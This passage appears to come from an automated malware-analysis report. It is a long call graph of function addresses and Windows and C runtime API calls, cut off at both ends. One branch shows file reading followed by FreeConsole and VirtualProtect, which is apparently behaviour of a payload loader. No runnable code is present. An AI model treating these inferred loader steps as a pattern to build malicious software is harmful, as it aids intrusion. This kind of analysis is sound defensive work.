API calls 20119->20120 20120->20121 20122 34b317 std::_Throw_Cpp_error 30 API calls 20121->20122 20125 3494db 20122->20125 20127 34efd2 ReleaseSRWLockExclusive 20123->20127 20126 34efd2 ReleaseSRWLockExclusive 20124->20126 20129 34b317 std::_Throw_Cpp_error 30 API calls 20125->20129 20132 3493ae 20126->20132 20128 349450 20127->20128 20130 34efc1 12 API calls 20128->20130 20131 3494ec 20129->20131 20133 34945c 20130->20133 20132->20037 20133->20119 20134 349463 20133->20134 20134->20125 20135 34946f 20134->20135 20159 34e95d WakeAllConditionVariable 20135->20159 20137 34948b 20138 34efd2 ReleaseSRWLockExclusive 20137->20138 20139 349494 20138->20139 20139->20132 20160 347a10 20139->20160 20143 34a668 _Yarn 20141->20143 20142 34935f 20142->20111 20143->20142 20144 355877 codecvt 2 API calls 20143->20144 20145 34a684 20143->20145 20144->20143 20146 34f338 codecvt 20145->20146 20148 34a68e Concurrency::cancel_current_task 20145->20148 20147 35060c Concurrency::cancel_current_task RaiseException 20146->20147 20149 34f354 20147->20149 20152 35060c 20148->20152 20151 34b4ce 20153 350654 RaiseException 20152->20153 20154 350626 20152->20154 20153->20151 20154->20153 20156 34b58b Concurrency::cancel_current_task 20155->20156 20157 35060c Concurrency::cancel_current_task RaiseException 20156->20157 20158 34b599 20157->20158 20159->20137 20161 347a4f 20160->20161 20163 347a75 20161->20163 20164 347b60 20161->20164 20163->20139 20165 347ba7 20164->20165 20166 347bc5 20165->20166 20167 347bb0 20165->20167 20173 348970 20166->20173 20169 34a663 codecvt 3 API calls 20167->20169 20170 347c00 20169->20170 20186 3473e0 20170->20186 20172 347bd9 20172->20163 20174 3489a9 20173->20174 20175 3489b0 20173->20175 20174->20175 20176 34a663 codecvt 3 API calls 20174->20176 20175->20172 20241 34b35e __EH_prolog3_GS 20240->20241 20248 34b281 20241->20248 20245 34b387 std::_Throw_Cpp_error 20269 34fb97 20245->20269 20249 34b29e 20248->20249 20249->20249 20272 34b39f 20249->20272 20251 34b2b2 20252 343430 20251->20252 20253 34345e 20252->20253 20254 343468 20253->20254 20255 34358b 20253->20255 20257 3434a4 20254->20257 20258 3434bd 20254->20258 20263 343470 codecvt 20254->20263 20256 342600 std::_Throw_Cpp_error 30 API calls 20255->20256 20267 343530 20256->20267 20259 34a663 codecvt 3 API calls 20257->20259 20260 34a663 codecvt 3 API calls 20258->20260 20259->20263 20260->20263 20307 3435a0 20263->20307 20264 3434f9 20266 350bf6 ___std_exception_copy 29 API calls 20264->20266 20266->20267 20268 34355c _Deallocate 20267->20268 20318 357ddf 20267->20318 20268->20245 20270 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20269->20270 20271 34fba1 20270->20271 20271->20271 20273 34b417 20272->20273 20276 34b3b6 std::_Throw_Cpp_error 20272->20276 20287 342600 20273->20287 20277 34b3bd std::_Throw_Cpp_error codecvt 20276->20277 20279 34b449 20276->20279 20277->20251 20280 34b455 20279->20280 20281 34b453 20279->20281 20282 34b464 20280->20282 20283 34b45d 20280->20283 20281->20277 20285 34a663 codecvt 3 API calls 20282->20285 20290 34b46c 20283->20290 20286 34b462 20285->20286 20286->20277 20299 34b4cf 20287->20299 20291 342610 20290->20291 20292 34b47d 20290->20292 20293 35060c Concurrency::cancel_current_task RaiseException 20291->20293 20294 34a663 codecvt 3 API calls 20292->20294 20295 342642 20293->20295 20296 34b483 20294->20296 20297 350bf6 ___std_exception_copy 29 API calls 20295->20297 20296->20286 20298 342678 20297->20298 20298->20286 20304 34b59a 20299->20304 20302 35060c Concurrency::cancel_current_task RaiseException 20303 34b4ee 20302->20303 20305 34b14d std::exception::exception 29 API calls 20304->20305 20306 34b4e0 20305->20306 20306->20302 20308 3435dd 20307->20308 20310 34361a 20307->20310 20308->20310 20323 343790 20308->20323 20311 343790 std::_Throw_Cpp_error 30 API calls 20310->20311 20312 3436b0 codecvt 20310->20312 20311->20312 20313 3436fc _Deallocate 20312->20313 20314 357ddf std::_Throw_Cpp_error 29 API calls 20312->20314 20313->20264 20315 34374a 20314->20315 20337 341460 20315->20337 20317 34375f 20317->20264 20346 35801e 20318->20346 20320 357dee 20350 357dfc IsProcessorFeaturePresent 20320->20350 20322 357dfb 20324 3438d5 20323->20324 20330 3437ad 20323->20330 20325 342600 std::_Throw_Cpp_error 30 API calls 20324->20325 20328 3437dc codecvt 20325->20328 20326 3437d1 20327 34a663 codecvt 3 API calls 20326->20327 20327->20328 20329 357ddf std::_Throw_Cpp_error 29 API calls 20328->20329 20336 343841 _Deallocate codecvt 20328->20336 20331 3438df 20329->20331 20330->20326 20330->20328 20332 3438c1 20330->20332 20333 3438bc 20330->20333 20334 34a663 codecvt 3 API calls 20332->20334 20341 342610 20333->20341 20334->20328 20336->20310 20338 34146c 20337->20338 20339 341486 _Deallocate 20337->20339 20338->20339 20340 357ddf std::_Throw_Cpp_error 29 API calls 20338->20340 20339->20317 20340->20338 20342 35060c Concurrency::cancel_current_task RaiseException 20341->20342 20343 342642 20342->20343 20344 350bf6 ___std_exception_copy 29 API calls 20343->20344 20345 342678 20344->20345 20345->20332 20347 358030 _Fputc 20346->20347 20354 357f78 20347->20354 20349 358048 _Fputc 20349->20320 20351 357e08 20350->20351 20370 357e30 20351->20370 20355 357f8f 20354->20355 20356 357f88 20354->20356 20361 357f9d 20355->20361 20367 357ff5 20355->20367 20363 3537f0 GetLastError 20356->20363 20359 357fc4 20360 357dfc __Getctype 11 API calls 20359->20360 20359->20361 20362 357ff4 20360->20362 20361->20349 20364 353809 20363->20364 20365 35c36c _Fputc 14 API calls 20364->20365 20366 353825 SetLastError 20365->20366 20366->20355 20368 358000 GetLastError SetLastError 20367->20368 20369 358019 20367->20369 20368->20359 20369->20359 20371 357e4c __fread_nolock CallUnexpected 20370->20371 20372 357e78 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20371->20372 20375 357f49 CallUnexpected 20372->20375 20373 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20374 357e1d GetCurrentProcess TerminateProcess 20373->20374 20374->20322 20375->20373 20376 3498f0 20377 34990f 20376->20377 20378 3498f9 20376->20378 20379 34b57d Concurrency::cancel_current_task RaiseException 20377->20379 20383 342270 GetModuleHandleA GetModuleFileNameW 20378->20383 20380 349914 20379->20380 20390 35a89a 20383->20390 20385 3422b0 20394 341fb0 GetPEB 20385->20394 20387 3422b9 20388 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20387->20388 20389 3422ca 20388->20389 20391 35a8ad _Fputc 20390->20391 20417 35a90f 20391->20417 20393 35a8bf _Fputc 20393->20385 20613 341240 20394->20613 20396 342009 CreateFileA 20398 342041 GetFileSize 20396->20398 20399 342225 20396->20399 20400 342055 20398->20400 20401 3421fc CloseHandle 20398->20401 20399->20387 20402 34205d ReadFile 20400->20402 20401->20399 20403 3421f3 20402->20403 20404 342079 CloseHandle 20402->20404 20403->20401 20405 342205 20404->20405 20406 342090 _Deallocate codecvt _strlen 20404->20406 20625 341ef0 20405->20625 20406->20405 20408 34223b 20406->20408 20410 342247 20406->20410 20412 34a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20406->20412 20638 341000 20406->20638 20409 342600 std::_Throw_Cpp_error 30 API calls 20408->20409 20409->20410 20411 357ddf std::_Throw_Cpp_error 29 API calls 20410->20411 20413 34224c 20411->20413 20412->20406 20414 341460 std::_Throw_Cpp_error 29 API calls 20413->20414 20416 34225f 20414->20416 20416->20387 20418 35a93f 20417->20418 20419 35a96c 20418->20419 20420 35a94e 20418->20420 20433 35a943 20418->20433 20421 35a979 20419->20421 20441 353790 20419->20441 20422 357f78 _Fputc 29 API calls 20420->20422 20425 35a9b1 20421->20425 20426 35a993 20421->20426 20422->20433 20424 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20427 35abb4 20424->20427 20429 35a9c5 20425->20429 20430 35ab41 20425->20430 20447 3666fb 20426->20447 20427->20393 20431 35aa5f 20429->20431 20429->20433 20437 35aa09 20429->20437 20432 35c021 _Fputc WideCharToMultiByte 20430->20432 20430->20433 20434 35c021 _Fputc WideCharToMultiByte 20431->20434 20432->20433 20433->20424 20435 35aa72 20434->20435 20435->20433 20438 35aa8b GetLastError 20435->20438 20451 35c021 20437->20451 20438->20433 20439 35aa9a 20438->20439 20439->20433 20440 35c021 _Fputc WideCharToMultiByte 20439->20440 20440->20439 20442 3537a0 20441->20442 20454 35c7a8 20442->20454 20450 366732 std::_Locinfo::_Locinfo_dtor codecvt 20447->20450 20448 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20449 366808 20448->20449 20449->20433 20450->20448 20452 35c034 _Fputc 20451->20452 20453 35c072 WideCharToMultiByte 20452->20453 20453->20433 20455 3537bd 20454->20455 20456 35c7bf 20454->20456 20458 35c7d9 20455->20458 20456->20455 20462 3608a5 20456->20462 20459 35c7f0 20458->20459 20461 3537ca 20458->20461 20459->20461 20610 35db02 20459->20610 20461->20421 20463 3608b1 ___scrt_is_nonwritable_in_current_image 20462->20463 20475 35c16a GetLastError 20463->20475 20467 3608d8 20503 360926 20467->20503 20472 360900 20472->20455 20476 35c180 20475->20476 20479 35c186 20475->20479 20477 35cb94 __Getctype 6 API calls 20476->20477 20477->20479 20478 35cbd3 __Getctype 6 API calls 20480 35c1a2 20478->20480 20479->20478 20481 35c18a SetLastError 20479->20481 20480->20481 20483 35d2b4 __Getctype 14 API calls 20480->20483 20485 35c21f 20481->20485 20486 35c21a 20481->20486 20484 35c1b7 20483->20484 20488 35c1d0 20484->20488 20489 35c1bf 20484->20489 20487 358353 CallUnexpected 37 API calls 20485->20487 20486->20472 20502 3580e1 EnterCriticalSection 20486->20502 20491 35c224 20487->20491 20490 35cbd3 __Getctype 6 API calls 20488->20490 20492 35cbd3 __Getctype 6 API calls 20489->20492 20493 35c1dc 20490->20493 20494 35c1cd 20492->20494 20495 35c1f7 20493->20495 20496 35c1e0 20493->20496 20498 35bed7 ___free_lconv_mon 14 API calls 20494->20498 20499 35c47c __Getctype 14 API calls 20495->20499 20497 35cbd3 __Getctype 6 API calls 20496->20497 20497->20494 20498->20481 20500 35c202 20499->20500 20501 35bed7 ___free_lconv_mon 14 API calls 20500->20501 20501->20481 20502->20467 20504 360934 __Getctype 20503->20504 20506 3608e9 20503->20506 20505 3606da __Getctype 14 API calls 20504->20505 20504->20506 20505->20506 20507 360905 20506->20507 20521 3580f8 LeaveCriticalSection 20507->20521 20509 3608fc 20509->20472 20510 358353 20509->20510 20522 35e3a0 20510->20522 20513 358363 20515 35836d IsProcessorFeaturePresent 20513->20515 20520 35838c 20513->20520 20517 358379 20515->20517 20519 357e30 CallUnexpected 8 API calls 20517->20519 20519->20520 20552 35555b 20520->20552 20521->20509 20555 35e623 20522->20555 20525 35e3c7 20526 35e3d3 ___scrt_is_nonwritable_in_current_image 20525->20526 20527 35c2bb __dosmaperr 14 API calls 20526->20527 20528 35e423 20526->20528 20530 35e435 CallUnexpected 20526->20530 20535 35e404 CallUnexpected 20526->20535 20527->20535 20531 3576e4 __Wcrtomb 14 API calls 20528->20531 20529 35e40d 20529->20513 20532 35e46b CallUnexpected 20530->20532 20568 3580e1 EnterCriticalSection 20530->20568 20533 35e428 20531->20533 20538 35e5a5 20532->20538 20539 35e4a8 20532->20539 20549 35e4d6 20532->20549 20565 357dcf 20533->20565 20535->20528 20535->20529 20535->20530 20540 35e5b0 20538->20540 20573 3580f8 LeaveCriticalSection 20538->20573 20544 35c16a __Getctype 39 API calls 20539->20544 20539->20549 20543 35555b CallUnexpected 21 API calls 20540->20543 20545 35e5b8 20543->20545 20547 35e4cb 20544->20547 20546 35c16a __Getctype 39 API calls 20550 35e52b 20546->20550 20548 35c16a __Getctype 39 API calls 20547->20548 20548->20549 20569 35e551 20549->20569 20550->20529 20551 35c16a __Getctype 39 API calls 20550->20551 20551->20529 20575 355690 20552->20575 20556 35e62f ___scrt_is_nonwritable_in_current_image 20555->20556 20561 3580e1 EnterCriticalSection 20556->20561 20558 35e63d 20562 35e67f 20558->20562 20561->20558 20563 3580f8 std::_Lockit::~_Lockit LeaveCriticalSection 20562->20563 20564 358358 20563->20564 20564->20513 20564->20525 20566 35801e __strnicoll 29 API calls 20565->20566 20567 357ddb 20566->20567 20567->20529 20568->20532 20570 35e555 20569->20570 20571 35e51d 20569->20571 20574 3580f8 LeaveCriticalSection 20570->20574 20571->20529 20571->20546 20571->20550 20573->20540 20574->20571 20576 3556bd 20575->20576 20577 3556cf 20575->20577 20602 34f896 GetModuleHandleW 20576->20602 20587 35582a 20577->20587 20581 35556c 20588 355836 ___scrt_is_nonwritable_in_current_image 20587->20588 20589 3580e1 std::_Lockit::_Lockit EnterCriticalSection 20588->20589 20590 355840 20589->20590 20591 355727 CallUnexpected 14 API calls 20590->20591 20592 35584d 20591->20592 20593 35586b CallUnexpected LeaveCriticalSection 20592->20593 20594 355706 20593->20594 20594->20581 20595 35565f 20594->20595 20596 355646 CallUnexpected 5 API calls 20595->20596 20597 355669 20596->20597 20598 35567d 20597->20598 20599 35566d GetCurrentProcess TerminateProcess 20597->20599 20600 3555c4 CallUnexpected GetModuleHandleExW GetProcAddress FreeLibrary 20598->20600 20599->20598 20601 355685 ExitProcess 20600->20601 20603 34f8a2 20602->20603 20603->20577 20604 3555c4 GetModuleHandleExW 20603->20604 20605 355624 20604->20605 20606 355603 GetProcAddress 20604->20606 20608 355633 20605->20608 20609 35562a FreeLibrary 20605->20609 20606->20605 20607 355617 20606->20607 20607->20605 20608->20577 20609->20608 20611 35c16a __Getctype 39 API calls 20610->20611 20612 35db07 20611->20612 20612->20461 20614 341402 20613->20614 20624 341283 _Deallocate codecvt _strlen 20613->20624 20614->20396 20615 341422 20616 342600 std::_Throw_Cpp_error 30 API calls 20615->20616 20617 34142e 20616->20617 20618 357ddf std::_Throw_Cpp_error 29 API calls 20617->20618 20620 341433 20618->20620 20619 34a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20619->20624 20621 341460 std::_Throw_Cpp_error 29 API calls 20620->20621 20623 34144f 20621->20623 20622 341000 102 API calls 20622->20624 20623->20396 20624->20614 20624->20615 20624->20617 20624->20619 20624->20622 20626 341240 102 API calls 20625->20626 20627 341f18 FreeConsole 20626->20627 20644 3414b0 20627->20644 20629 341f39 20630 3414b0 103 API calls 20629->20630 20631 341f4a 20630->20631 20632 341240 102 API calls 20631->20632 20633 341f5d VirtualProtect 20632->20633 20635 341f7e 20633->20635 20636 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20635->20636 20637 341fa3 20636->20637 20637->20399 20639 341013 20638->20639 21113 342750 20639->21113 20643 341031 20643->20406 20643->20643 20648 3414f0 20644->20648 20649 341702 _Deallocate 20648->20649 20650 3416dd 20648->20650 20654 344320 20648->20654 20667 341750 20648->20667 20681 341d10 20648->20681 20649->20629 20650->20649 20651 357ddf std::_Throw_Cpp_error 29 API calls 20650->20651 20652 341725 20651->20652 20689 341ea0 20652->20689 20655 344364 20654->20655 20656 34444e 20654->20656 20658 3443a5 20655->20658 20659 34437e 20655->20659 20665 344393 codecvt 20655->20665 20657 342610 std::_Throw_Cpp_error 30 API calls 20656->20657 20657->20665 20660 34a663 codecvt 3 API calls 20658->20660 20659->20656 20662 34438a 20659->20662 20660->20665 20661 357ddf std::_Throw_Cpp_error 29 API calls 20664 344458 20661->20664 20663 34a663 codecvt 3 API calls 20662->20663 20663->20665 20665->20661 20666 344424 _Deallocate 20665->20666 20666->20648 20668 341788 _strlen 20667->20668 20671 341833 20668->20671 20678 34180d 20668->20678 20720 342c50 20668->20720 20671->20678 20694 344460 20671->20694 20673 341b8e 20674 341b9f 20673->20674 20730 3438e0 20673->20730 20674->20648 20676 35060c Concurrency::cancel_current_task RaiseException 20676->20678 20678->20673 20678->20676 20738 342f00 20678->20738 20746 3432c0 20678->20746 20679 34188d 20679->20678 20711 34def0 20679->20711 20682 341d5c 20681->20682 20683 344460 67 API calls 20682->20683 20684 341d70 20683->20684 21103 344b10 20684->21103 20687 342c50 39 API calls 20688 341deb 20687->20688 20688->20648 20690 341ea9 20689->20690 20691 341ec2 _Deallocate 20689->20691 20690->20691 20692 357ddf std::_Throw_Cpp_error 29 API calls 20690->20692 20693 341eec 20692->20693 20763 34a9f4 20694->20763 20697 34a9f4 std::_Lockit::_Lockit 7 API calls 20698 3444b7 20697->20698 20769 34aa25 20698->20769 20699 3444d8 20709 344556 20699->20709 20776 3445f0 20699->20776 20700 34aa25 std::_Lockit::~_Lockit 2 API calls 20703 344585 20700->20703 20703->20679 20705 344543 20788 34ab43 20705->20788 20706 344598 20793 343e50 20706->20793 20709->20700 20715 34df1e 20711->20715 20719 34df17 20711->20719 20712 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 20713 34e01c 20712->20713 20713->20679 20716 34dfd0 20715->20716 20717 34df69 20715->20717 20715->20719 20716->20719 20994 35932d 20716->20994 20717->20719 20991 34dada 20717->20991 20719->20712 20721 342d5a 20720->20721 20722 342c90 20720->20722 20721->20671 20723 342cb3 20722->20723 20724 342c50 39 API calls 20722->20724 20728 342cd7 20722->20728 20723->20721 20725 3438e0 39 API calls 20723->20725 20724->20728 20725->20721 20726 342f00 std::ios_base::_Init 38 API calls 20726->20728 20727 3432c0 std::ios_base::_Init 30 API calls 20727->20728 20728->20723 20728->20726 20728->20727 20729 35060c Concurrency::cancel_current_task RaiseException 20728->20729 20729->20728 20731 343919 20730->20731 20737 343962 20730->20737 20732 342f00 std::ios_base::_Init 38 API calls 20731->20732 20731->20737 20733 343998 20732->20733 20734 3432c0 std::ios_base::_Init 30 API calls 20733->20734 20735 3439aa 20734->20735 20736 35060c Concurrency::cancel_current_task RaiseException 20735->20736 20736->20737 20737->20674 20739 342f34 20738->20739 20740 342f28 20738->20740 21073 34a6ef AcquireSRWLockExclusive 20739->21073 20740->20678 20742 342f40 20742->20740 21078 34a7a4 20742->21078 20747 343307 _strlen 20746->20747 20748 343312 20747->20748 20749 3433ff 20747->20749 20751 343352 20748->20751 20752 343369 20748->20752 20756 34331c codecvt 20748->20756 20750 342600 std::_Throw_Cpp_error 30 API calls 20749->20750 20761 3433ad 20750->20761 20753 34a663 codecvt 3 API calls 20751->20753 20754 34a663 codecvt 3 API calls 20752->20754 20753->20756 20754->20756 20755 357ddf std::_Throw_Cpp_error 29 API calls 20757 343409 20755->20757 20759 343430 std::_Throw_Cpp_error 30 API calls 20756->20759 20758 341460 std::_Throw_Cpp_error 29 API calls 20757->20758 20760 34341f 20758->20760 20759->20761 20760->20678 20761->20755 20762 3433d3 _Deallocate 20761->20762 20762->20678 20764 34aa03 20763->20764 20765 34aa0a 20763->20765 20796 35810f 20764->20796 20766 34449a 20765->20766 20801 34fac8 EnterCriticalSection 20765->20801 20766->20697 20766->20699 20770 35811d 20769->20770 20771 34aa2f 20769->20771 20854 3580f8 LeaveCriticalSection 20770->20854 20772 34aa42 20771->20772 20853 34fad6 LeaveCriticalSection 20771->20853 20772->20699 20775 358124 20775->20699 20777 344628 20776->20777 20778 34453b 20776->20778 20777->20778 20779 34a663 codecvt 3 API calls 20777->20779 20778->20705 20778->20706 20780 34463b 20779->20780 20855 343e90 20780->20855 20790 34ab4e _Yarn 20788->20790 20789 34ab55 20789->20709 20790->20789 20987 34b4b2 20790->20987 20794 35060c Concurrency::cancel_current_task RaiseException 20793->20794 20795 343e82 20794->20795 20802 35ced4 20796->20802 20801->20766 20823 35d05b 20802->20823 20824 35cfd6 __Getctype 5 API calls 20823->20824 20825 35ced9 20824->20825 20826 35d075 20825->20826 20827 35cfd6 __Getctype 5 API calls 20826->20827 20828 35cede 20827->20828 20829 35d08f 20828->20829 20830 35cfd6 __Getctype 5 API calls 20829->20830 20831 35cee3 20830->20831 20832 35d0a9 20831->20832 20833 35cfd6 __Getctype 5 API calls 20832->20833 20834 35cee8 20833->20834 20835 35d0c3 20834->20835 20836 35cfd6 __Getctype 5 API calls 20835->20836 20837 35ceed 20836->20837 20838 35d0dd 20837->20838 20839 35cfd6 __Getctype 5 API calls 20838->20839 20840 35cef2 20839->20840 20841 35d0f7 20840->20841 20842 35cfd6 __Getctype 5 API calls 20841->20842 20843 35cef7 20842->20843 20844 35d111 20843->20844 20853->20772 20854->20775 20856 34a9f4 std::_Lockit::_Lockit 7 API calls 20855->20856 20857 343ecb 20856->20857 20858 343f3f 20857->20858 20859 343f18 20857->20859 20926 34b4ef 20858->20926 20917 34abc5 20859->20917 20878 34ecbf 20940 353114 20878->20940 20931 35974f 20917->20931 20921 34abea 20922 34abf9 20921->20922 20923 35974f std::_Locinfo::_Locinfo_dtor 64 API calls 20921->20923 20924 34ac2b _Yarn 14 API calls 20922->20924 20923->20922 20925 343f26 20924->20925 20925->20878 20927 347900 codecvt 29 API calls 20926->20927 20928 34b500 20927->20928 20929 35060c Concurrency::cancel_current_task RaiseException 20928->20929 20930 34b50e 20929->20930 20932 35ced4 std::_Lockit::_Lockit 5 API calls 20931->20932 20933 35975c 20932->20933 20934 359981 std::_Locinfo::_Locinfo_dtor 64 API calls 20933->20934 20935 34abd2 20934->20935 20936 34ac2b 20935->20936 20937 34ac39 20936->20937 20939 34ac45 _Yarn codecvt 20936->20939 20938 3592d7 ___std_exception_destroy 14 API calls 20937->20938 20937->20939 20938->20939 20939->20921 20939->20939 20988 34b4c0 Concurrency::cancel_current_task 20987->20988 20989 35060c Concurrency::cancel_current_task RaiseException 20988->20989 20990 34b4ce 20989->20990 20998 358d91 20991->20998 20993 34dae8 20993->20719 20995 359340 _Fputc 20994->20995 21046 35950e 20995->21046 20997 359355 _Fputc 20997->20719 20999 358da4 _Fputc 20998->20999 21002 358f33 20999->21002 21001 358db3 _Fputc 21001->20993 21003 358f3f ___scrt_is_nonwritable_in_current_image 21002->21003 21004 358f46 21003->21004 21005 358f6b 21003->21005 21006 357f78 _Fputc 29 API calls 21004->21006 21013 353315 EnterCriticalSection 21005->21013 21008 358f61 21006->21008 21008->21001 21009 358f7a 21014 358dc7 21009->21014 21013->21009 21015 358dec 21014->21015 21016 358dfe 21014->21016 21017 358eff _Fputc 66 API calls 21015->21017 21018 35f704 __fread_nolock 29 API calls 21016->21018 21019 358df6 21017->21019 21020 358e05 21018->21020 21021 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21019->21021 21022 35f704 __fread_nolock 29 API calls 21020->21022 21026 358e2d 21020->21026 21023 358efd 21021->21023 21025 358e16 21022->21025 21043 358fbb 21023->21043 21024 358ee3 21027 358eff _Fputc 66 API calls 21024->21027 21025->21026 21028 35f704 __fread_nolock 29 API calls 21025->21028 21026->21024 21029 35f704 __fread_nolock 29 API calls 21026->21029 21027->21019 21031 358e60 21029->21031 21047 359544 21046->21047 21048 35951c 21046->21048 21047->20997 21048->21047 21049 359529 21048->21049 21050 35954b 21048->21050 21051 357f78 _Fputc 29 API calls 21049->21051 21054 3595d1 21050->21054 21051->21047 21055 3595dd ___scrt_is_nonwritable_in_current_image 21054->21055 21062 353315 EnterCriticalSection 21055->21062 21057 3595eb 21063 359585 21057->21063 21062->21057 21064 35e68b 30 API calls 21063->21064 21065 35959d 21064->21065 21066 359367 66 API calls 21065->21066 21067 3595bb 21066->21067 21068 35e774 64 API calls 21067->21068 21074 34a703 21073->21074 21075 34a708 ReleaseSRWLockExclusive 21074->21075 21082 34a78f SleepConditionVariableSRW 21074->21082 21075->20742 21083 34a7b9 21078->21083 21081 34a73e AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 21081->20740 21082->21074 21084 34a7cf 21083->21084 21085 34a7c8 21083->21085 21092 3573cb 21084->21092 21089 35743c 21085->21089 21088 342f58 21088->21081 21090 3573cb std::ios_base::_Init 32 API calls 21089->21090 21091 35744e 21090->21091 21091->21088 21095 35762e 21092->21095 21096 35763a ___scrt_is_nonwritable_in_current_image 21095->21096 21097 3580e1 std::_Lockit::_Lockit EnterCriticalSection 21096->21097 21098 357648 21097->21098 21099 357452 std::ios_base::_Init 32 API calls 21098->21099 21100 357655 21099->21100 21101 35767d std::ios_base::_Init LeaveCriticalSection 21100->21101 21102 3573fc 21101->21102 21102->21088 21104 344b4f 21103->21104 21105 342c50 39 API calls 21104->21105 21109 344b6f 21104->21109 21105->21109 21106 342f00 std::ios_base::_Init 38 API calls 21106->21109 21107 341de4 21107->20687 21108 344c3e 21108->21107 21111 3438e0 39 API calls 21108->21111 21109->21106 21109->21108 21110 3432c0 std::ios_base::_Init 30 API calls 21109->21110 21112 35060c Concurrency::cancel_current_task RaiseException 21109->21112 21110->21109 21111->21107 21112->21109 21114 3427ae 21113->21114 21115 342c50 39 API calls 21114->21115 21119 3427fa 21114->21119 21123 3427d1 21114->21123 21115->21119 21116 342f00 std::ios_base::_Init 38 API calls 21116->21123 21117 3429de 21120 341028 21117->21120 21121 3438e0 39 API calls 21117->21121 21118 3432c0 std::ios_base::_Init 30 API calls 21118->21123 21119->21123 21133 34cfb0 21119->21133 21125 341110 21120->21125 21121->21120 21122 35060c Concurrency::cancel_current_task RaiseException 21122->21123 21123->21116 21123->21117 21123->21118 21123->21122 21126 34115c 21125->21126 21137 343c70 21126->21137 21131 342c50 39 API calls 21132 3411eb 21131->21132 21132->20643 21134 34cfbf 21133->21134 21136 34cfd2 codecvt 21133->21136 21134->21123 21135 35932d 69 API calls 21135->21134 21136->21134 21136->21135 21138 34a9f4 std::_Lockit::_Lockit 7 API calls 21137->21138 21139 343caa 21138->21139 21140 34a9f4 std::_Lockit::_Lockit 7 API calls 21139->21140 21142 343ce5 21139->21142 21141 343cc4 21140->21141 21145 34aa25 std::_Lockit::~_Lockit 2 API calls 21141->21145 21146 34a663 codecvt 3 API calls 21142->21146 21155 343daf 21142->21155 21143 34aa25 std::_Lockit::~_Lockit 2 API calls 21144 341170 21143->21144 21156 343a00 21144->21156 21145->21142 21147 343d4a 21146->21147 21148 343e90 codecvt 67 API calls 21147->21148 21149 343d7c 21148->21149 21150 34ecbf __Getctype 39 API calls 21149->21150 21151 343d97 21150->21151 21152 344010 codecvt 65 API calls 21151->21152 21153 343da2 21152->21153 21154 34ab43 RaiseException 21153->21154 21154->21155 21155->21143 21157 343a3f 21156->21157 21159 342c50 39 API calls 21157->21159 21160 343a85 21157->21160 21161 343a5f 21157->21161 21158 342f00 std::ios_base::_Init 38 API calls 21158->21161 21159->21160 21160->21161 21170 34cb32 21160->21170 21183 34cb22 21160->21183 21195 34cb40 21160->21195 21161->21158 21162 3432c0 std::ios_base::_Init 30 API calls 21161->21162 21164 343b2d 21161->21164 21166 35060c Concurrency::cancel_current_task RaiseException 21161->21166 21162->21161 21163 3411e4 21163->21131 21164->21163 21165 3438e0 39 API calls 21164->21165 21165->21163 21166->21161 21171 34cb39 21170->21171 21175 34cb85 21170->21175 21207 353329 LeaveCriticalSection 21171->21207 21173 34cb10 21173->21161 21174 34cb3e 21174->21161 21175->21173 21176 34cc09 21175->21176 21177 34cbea 21175->21177 21178 35932d 69 API calls 21176->21178 21181 34cbfb 21176->21181 21177->21181 21204 34c44d 21177->21204 21178->21181 21180 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21182 34cc48 21180->21182 21181->21180 21182->21161 21184 34cb29 21183->21184 21189 34cb75 21183->21189 21244 353315 EnterCriticalSection 21184->21244 21186 34cb2e 21186->21161 21187 34cb79 21188 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21187->21188 21190 34cc48 21188->21190 21189->21187 21192 34cc09 21189->21192 21193 34cba9 21189->21193 21190->21161 21191 34c44d _Fputc 68 API calls 21191->21187 21192->21187 21194 35932d 69 API calls 21192->21194 21193->21187 21193->21191 21194->21187 21198 34cb63 21195->21198 21200 34cb5c 21195->21200 21196 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21197 34cc48 21196->21197 21197->21161 21198->21200 21201 34cc09 21198->21201 21202 34cba9 21198->21202 21199 34c44d _Fputc 68 API calls 21199->21200 21200->21196 21201->21200 21203 35932d 69 API calls 21201->21203 21202->21199 21202->21200 21203->21200 21208 358bfc 21204->21208 21206 34c45d 21206->21181 21207->21174 21209 358c0f _Fputc 21208->21209 21212 358c5d 21209->21212 21211 358c1e _Fputc 21211->21206 21213 358c69 ___scrt_is_nonwritable_in_current_image 21212->21213 21214 358c96 21213->21214 21215 358c72 21213->21215 21228 353315 EnterCriticalSection 21214->21228 21216 357f78 _Fputc 29 API calls 21215->21216 21225 358c8b _Fputc 21216->21225 21218 358c9f 21219 358cb4 21218->21219 21234 35f704 21218->21234 21221 358d51 21219->21221 21222 358d20 21219->21222 21229 358c30 21221->21229 21223 357f78 _Fputc 29 API calls 21222->21223 21223->21225 21225->21211 21226 358d5d 21228->21218 21230 358c4f 21229->21230 21231 358c3e 21229->21231 21230->21226 21232 364a37 _Fputc 66 API calls 21231->21232 21235 35f725 21234->21235 21236 35f710 21234->21236 21235->21219 21237 3576e4 __Wcrtomb 14 API calls 21236->21237 21238 35f715 21237->21238 21239 357dcf __strnicoll 29 API calls 21238->21239 21244->21186 21245 3415d0 21256 341e40 21245->21256 21247 341702 _Deallocate 21248 344320 30 API calls 21253 3415db 21248->21253 21249 3416dd 21249->21247 21250 357ddf 